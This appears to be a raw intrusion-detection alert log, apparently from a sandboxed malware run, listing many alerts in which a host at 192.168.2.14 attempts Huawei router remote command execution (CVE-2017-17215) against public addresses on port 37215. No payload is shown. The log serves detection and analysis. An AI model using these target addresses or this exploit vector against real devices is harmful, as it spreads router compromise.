                                                    07/10/24-08:26:33.208754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3849237215192.168.2.14197.250.37.66
                                                    07/10/24-08:26:17.941033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5746837215192.168.2.14157.125.241.24
                                                    07/10/24-08:26:41.578531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4027237215192.168.2.14157.189.123.133
                                                    07/10/24-08:26:55.289517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4380637215192.168.2.14157.170.237.164
                                                    07/10/24-08:27:32.507738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3509437215192.168.2.1485.41.224.154
                                                    07/10/24-08:26:43.865375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4266637215192.168.2.14197.204.226.106
                                                    07/10/24-08:26:33.204295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4908037215192.168.2.14197.51.151.142
                                                    07/10/24-08:26:26.500109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3424237215192.168.2.14179.84.134.151
                                                    07/10/24-08:26:47.749012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4988637215192.168.2.14157.13.186.162
                                                    07/10/24-08:26:25.485582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5644437215192.168.2.1441.148.122.219
                                                    07/10/24-08:26:29.864759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3352837215192.168.2.14157.164.36.92
                                                    07/10/24-08:26:59.660364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4066837215192.168.2.14197.95.45.81
                                                    07/10/24-08:27:08.410834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5188037215192.168.2.14157.29.171.211
                                                    07/10/24-08:27:11.537830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5287037215192.168.2.14197.170.197.156
                                                    07/10/24-08:26:25.514103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5262237215192.168.2.14197.25.73.251
                                                    07/10/24-08:27:27.037222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4434037215192.168.2.14197.8.59.194
                                                    07/10/24-08:26:20.145425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4472637215192.168.2.14197.209.40.86
                                                    07/10/24-08:27:20.412870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3550237215192.168.2.14197.9.153.149
                                                    07/10/24-08:26:36.427359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5443437215192.168.2.1441.143.218.57
                                                    07/10/24-08:26:28.775037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4686237215192.168.2.14157.143.241.196
                                                    07/10/24-08:26:42.436747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3849837215192.168.2.14197.28.133.178
                                                    07/10/24-08:27:02.674320TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6015637215192.168.2.14157.67.40.43
                                                    07/10/24-08:26:48.005447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3371237215192.168.2.14197.181.37.65
                                                    07/10/24-08:26:20.152371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5629837215192.168.2.1441.59.170.186
                                                    07/10/24-08:27:08.373070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4352637215192.168.2.14197.106.50.16
                                                    07/10/24-08:26:31.040433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4138437215192.168.2.14158.65.101.169
                                                    07/10/24-08:26:45.690797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4067437215192.168.2.14197.56.39.220
                                                    07/10/24-08:26:53.247062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3621237215192.168.2.14157.196.29.109
                                                    07/10/24-08:27:31.441274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4618437215192.168.2.1441.245.254.200
                                                    07/10/24-08:26:55.366242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4504437215192.168.2.1441.45.128.105
                                                    07/10/24-08:26:22.290306TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5669837215192.168.2.14157.216.178.0
                                                    07/10/24-08:26:42.356515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4221837215192.168.2.14197.170.133.42
                                                    07/10/24-08:26:52.022283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4956837215192.168.2.14157.64.182.209
                                                    07/10/24-08:26:53.155624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4686837215192.168.2.1441.123.63.240
                                                    07/10/24-08:27:14.858579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4659837215192.168.2.1435.38.75.26
                                                    07/10/24-08:26:55.462575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5225437215192.168.2.1441.165.204.8
                                                    07/10/24-08:26:34.188754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5041437215192.168.2.14197.11.104.191
                                                    07/10/24-08:27:23.792966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4359237215192.168.2.14157.107.16.165
                                                    07/10/24-08:26:20.170023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5274837215192.168.2.14157.113.39.238
                                                    07/10/24-08:27:07.361334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5090037215192.168.2.14158.187.240.247
                                                    07/10/24-08:27:02.759865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4103037215192.168.2.14118.14.101.102
                                                    07/10/24-08:26:41.362168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5441637215192.168.2.1441.191.175.59
                                                    07/10/24-08:26:59.757690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4025237215192.168.2.14157.239.128.34
                                                    07/10/24-08:26:41.462014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5332637215192.168.2.141.77.198.180
                                                    07/10/24-08:27:05.194226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3679237215192.168.2.14148.111.39.182
                                                    07/10/24-08:27:02.840252TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4900237215192.168.2.14197.143.234.119
                                                    07/10/24-08:26:34.234047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3768237215192.168.2.14197.39.185.227
                                                    07/10/24-08:26:43.919816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5500237215192.168.2.14168.100.97.42
                                                    07/10/24-08:27:19.324318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5121837215192.168.2.1441.9.188.238
                                                    07/10/24-08:26:33.268037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3409637215192.168.2.14197.251.247.42
                                                    07/10/24-08:27:27.133887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3324437215192.168.2.14197.175.134.197
                                                    07/10/24-08:27:19.163791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4861037215192.168.2.14157.212.51.219
                                                    07/10/24-08:26:28.728877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5141437215192.168.2.1441.35.55.197
                                                    07/10/24-08:26:34.254772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4979637215192.168.2.1441.124.51.186
                                                    07/10/24-08:27:17.039425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5125037215192.168.2.14222.46.68.216
                                                    07/10/24-08:26:11.613334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6018837215192.168.2.1489.24.181.240
                                                    07/10/24-08:26:26.583934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4663037215192.168.2.1441.177.40.250
                                                    07/10/24-08:26:13.768963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4915637215192.168.2.14157.101.32.85
                                                    07/10/24-08:27:22.784576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5846437215192.168.2.14197.41.214.13
                                                    07/10/24-08:27:27.063010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5006637215192.168.2.14157.15.255.139
                                                    07/10/24-08:26:34.251159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5717237215192.168.2.1441.100.89.102
                                                    07/10/24-08:26:14.626049TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3359637215192.168.2.1441.70.63.61
                                                    07/10/24-08:26:29.775868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3659637215192.168.2.14165.131.6.89
                                                    07/10/24-08:26:14.813638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5992637215192.168.2.14157.187.226.72
                                                    07/10/24-08:27:02.694487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4631437215192.168.2.14157.242.240.203
                                                    07/10/24-08:26:14.812740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4528637215192.168.2.1441.173.39.158
                                                    07/10/24-08:26:26.592095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4341037215192.168.2.14172.13.119.26
                                                    07/10/24-08:26:44.567411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5112437215192.168.2.14161.200.193.17
                                                    07/10/24-08:26:43.592956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4334837215192.168.2.14197.249.107.49
                                                    07/10/24-08:26:22.279073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4278437215192.168.2.14197.172.25.172
                                                    07/10/24-08:27:33.895766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4292837215192.168.2.1441.111.25.14
                                                    07/10/24-08:26:59.778453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4042637215192.168.2.14197.116.5.235
                                                    07/10/24-08:27:24.921580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5659437215192.168.2.14197.209.36.245
                                                    07/10/24-08:27:28.130365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5211237215192.168.2.14197.123.172.236
                                                    07/10/24-08:26:28.927122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3867837215192.168.2.1441.12.183.15
                                                    07/10/24-08:26:47.789703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4615037215192.168.2.14197.153.219.253
                                                    07/10/24-08:27:14.850693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4881837215192.168.2.14197.67.37.200
                                                    07/10/24-08:26:22.273376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5644637215192.168.2.1441.91.155.177
                                                    07/10/24-08:26:36.330263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3534837215192.168.2.1434.235.136.175
                                                    07/10/24-08:26:36.367813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5802037215192.168.2.14197.198.81.87
                                                    07/10/24-08:27:27.151172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4629037215192.168.2.1441.64.113.121
                                                    07/10/24-08:26:13.828285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5204037215192.168.2.1441.15.227.169
                                                    07/10/24-08:26:41.464716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3956437215192.168.2.1441.7.160.99
                                                    07/10/24-08:26:52.079207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5840237215192.168.2.14157.210.91.10
                                                    07/10/24-08:26:59.598591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5598637215192.168.2.1419.90.42.13
                                                    07/10/24-08:27:17.005251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5187237215192.168.2.14202.214.69.143
                                                    07/10/24-08:26:29.861984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3951037215192.168.2.1453.6.140.73
                                                    07/10/24-08:26:38.576463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6066037215192.168.2.14106.65.56.3
                                                    07/10/24-08:27:19.290878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4126837215192.168.2.14157.42.159.159
                                                    07/10/24-08:27:19.198870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4523837215192.168.2.14119.1.41.6
                                                    07/10/24-08:27:23.905931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5124437215192.168.2.14157.212.204.230
                                                    07/10/24-08:26:41.585181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6028637215192.168.2.14149.123.250.157
                                                    07/10/24-08:27:22.849786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5196637215192.168.2.14157.240.153.211
                                                    07/10/24-08:26:48.013937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3401437215192.168.2.14146.39.121.168
                                                    07/10/24-08:27:22.539447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4212437215192.168.2.1441.163.119.124
                                                    07/10/24-08:26:57.596939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5880437215192.168.2.14197.4.154.215
                                                    07/10/24-08:27:30.411033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3467237215192.168.2.14197.160.207.55
                                                    07/10/24-08:27:10.647678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5857837215192.168.2.14197.247.251.74
                                                    07/10/24-08:26:28.834165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6041837215192.168.2.14157.229.172.152
                                                    07/10/24-08:26:38.575059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3443037215192.168.2.1413.234.82.19
                                                    07/10/24-08:26:28.782000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6080637215192.168.2.1441.115.10.231
                                                    07/10/24-08:26:57.644790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4064437215192.168.2.14157.196.59.165
                                                    07/10/24-08:26:53.121888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4847237215192.168.2.14157.33.181.5
                                                    07/10/24-08:27:32.609585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4384037215192.168.2.14157.102.249.221
                                                    07/10/24-08:27:28.114427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5074437215192.168.2.14165.201.190.181
                                                    07/10/24-08:26:29.842952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5753237215192.168.2.14197.112.193.159
                                                    07/10/24-08:27:22.831755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5184437215192.168.2.1441.175.40.71
                                                    07/10/24-08:26:25.420167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3580237215192.168.2.14157.75.244.31
                                                    07/10/24-08:26:36.425818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4544637215192.168.2.14219.192.81.67
                                                    07/10/24-08:27:32.592658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4772837215192.168.2.14201.128.33.31
                                                    07/10/24-08:26:33.248945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3688637215192.168.2.1441.132.238.135
                                                    07/10/24-08:26:59.649070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4542637215192.168.2.14197.255.39.131
                                                    07/10/24-08:27:24.946656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4930637215192.168.2.14157.238.27.248
                                                    07/10/24-08:27:08.410833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5755037215192.168.2.14157.87.94.196
                                                    07/10/24-08:27:33.771362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5994037215192.168.2.1441.90.183.251
                                                    07/10/24-08:26:13.781543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5996037215192.168.2.14197.28.157.243
                                                    07/10/24-08:26:23.347841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5501437215192.168.2.1452.147.44.145
                                                    07/10/24-08:26:57.641375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4838437215192.168.2.14197.47.176.155
                                                    07/10/24-08:27:08.318439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6048437215192.168.2.14197.100.144.36
                                                    07/10/24-08:27:30.506751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3437437215192.168.2.1441.218.160.105
                                                    07/10/24-08:26:23.341408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4256837215192.168.2.14197.155.254.254
                                                    07/10/24-08:26:43.631742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3779637215192.168.2.14200.59.203.117
                                                    07/10/24-08:26:59.816598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4456037215192.168.2.1413.24.179.75
                                                    07/10/24-08:27:05.094714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5675037215192.168.2.14149.92.168.248
                                                    07/10/24-08:26:43.574763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3685037215192.168.2.14205.215.224.98
                                                    07/10/24-08:26:28.777569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5217037215192.168.2.14157.117.35.153
                                                    07/10/24-08:27:23.937541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4080037215192.168.2.148.107.19.88
                                                    07/10/24-08:26:25.503174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4748637215192.168.2.1475.28.141.169
                                                    07/10/24-08:26:51.951264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4163037215192.168.2.14199.237.65.160
                                                    07/10/24-08:27:13.986836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5157237215192.168.2.1486.37.178.104
                                                    07/10/24-08:27:19.310964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5754637215192.168.2.14197.91.201.228
                                                    07/10/24-08:27:33.882743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4305237215192.168.2.14192.219.249.226
                                                    07/10/24-08:27:02.807420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4246037215192.168.2.14197.156.87.147
                                                    07/10/24-08:27:11.525645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5999437215192.168.2.14157.115.107.237
                                                    07/10/24-08:26:13.833960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5789037215192.168.2.1441.36.146.121
                                                    07/10/24-08:26:17.952819TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4077837215192.168.2.1441.149.255.220
                                                    07/10/24-08:26:22.282645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4691637215192.168.2.14197.20.131.136
                                                    07/10/24-08:26:36.391790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5454237215192.168.2.14183.126.26.209
                                                    07/10/24-08:26:29.855669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4324837215192.168.2.14157.167.166.224
                                                    07/10/24-08:26:23.351909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4682437215192.168.2.1441.176.82.218
                                                    07/10/24-08:26:18.011979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4541037215192.168.2.14157.168.30.151
                                                    07/10/24-08:26:26.532653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4045037215192.168.2.14157.225.242.118
                                                    07/10/24-08:26:41.560795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4548637215192.168.2.1441.248.102.72
                                                    07/10/24-08:27:28.177023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4331037215192.168.2.1441.145.240.66
                                                    07/10/24-08:26:17.944917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4987037215192.168.2.14197.249.192.116
                                                    07/10/24-08:26:49.855576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3384237215192.168.2.1441.135.65.201
                                                    07/10/24-08:26:28.821569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5365037215192.168.2.14197.52.159.133
                                                    07/10/24-08:26:36.406451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4802637215192.168.2.1441.111.44.33
                                                    07/10/24-08:26:18.010267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4598437215192.168.2.1441.233.67.42
                                                    07/10/24-08:26:18.012048TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5850637215192.168.2.1441.99.22.121
                                                    07/10/24-08:26:29.794005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4609237215192.168.2.14197.206.218.42
                                                    07/10/24-08:26:43.758482TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4289437215192.168.2.14197.133.54.1
                                                    07/10/24-08:27:02.933980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5089037215192.168.2.14157.96.93.192
                                                    07/10/24-08:26:38.610218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3492037215192.168.2.14197.110.195.50
                                                    07/10/24-08:27:30.538484TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5843437215192.168.2.14197.74.43.136
                                                    07/10/24-08:27:10.601201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3950837215192.168.2.14157.230.21.82
                                                    07/10/24-08:26:11.485885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4294437215192.168.2.1441.71.63.179
                                                    07/10/24-08:26:23.342477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3476437215192.168.2.14197.41.189.148
                                                    07/10/24-08:26:36.387027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3350837215192.168.2.14157.123.44.9
                                                    07/10/24-08:26:13.849175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4959837215192.168.2.14197.21.190.40
                                                    07/10/24-08:26:23.357682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3818437215192.168.2.1441.217.166.34
                                                    07/10/24-08:26:55.442077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3287437215192.168.2.14197.225.187.177
                                                    07/10/24-08:26:57.633994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4228637215192.168.2.14157.189.183.18
                                                    07/10/24-08:26:43.780155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5326037215192.168.2.14197.163.209.254
                                                    07/10/24-08:26:47.941527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4053837215192.168.2.14198.87.163.123
                                                    07/10/24-08:26:57.631104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5084237215192.168.2.14157.64.95.117
                                                    07/10/24-08:26:11.575956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3829237215192.168.2.14197.225.165.212
                                                    07/10/24-08:27:14.867068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5183837215192.168.2.14197.87.144.61
                                                    07/10/24-08:26:11.572202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4869237215192.168.2.14197.43.251.239
                                                    07/10/24-08:26:14.743404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3952037215192.168.2.14157.235.247.90
                                                    07/10/24-08:27:31.465521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5452237215192.168.2.14157.161.157.190
                                                    07/10/24-08:26:36.403967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5684837215192.168.2.14204.177.182.207
                                                    07/10/24-08:26:13.852181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3457637215192.168.2.1441.179.208.111
                                                    07/10/24-08:26:59.667418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5810237215192.168.2.14134.94.200.160
                                                    07/10/24-08:26:49.770059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5495037215192.168.2.14157.111.173.69
                                                    07/10/24-08:26:57.570720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3825037215192.168.2.1441.190.75.77
                                                    07/10/24-08:27:27.065687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5592437215192.168.2.14170.35.237.9
                                                    07/10/24-08:26:28.917896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3713837215192.168.2.1441.255.41.101
                                                    07/10/24-08:26:49.802852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3428037215192.168.2.14157.72.23.109
                                                    07/10/24-08:27:07.369832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5787837215192.168.2.14197.86.112.91
                                                    07/10/24-08:26:55.429155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3729837215192.168.2.14152.34.48.100
                                                    07/10/24-08:26:23.297905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4576637215192.168.2.1441.176.249.104
                                                    07/10/24-08:26:20.110888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3693237215192.168.2.14157.216.110.19
                                                    07/10/24-08:27:30.423291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5829637215192.168.2.1441.168.75.192
                                                    07/10/24-08:27:32.617862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4894037215192.168.2.14197.18.127.113
                                                    07/10/24-08:27:10.558614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5574837215192.168.2.1441.16.21.124
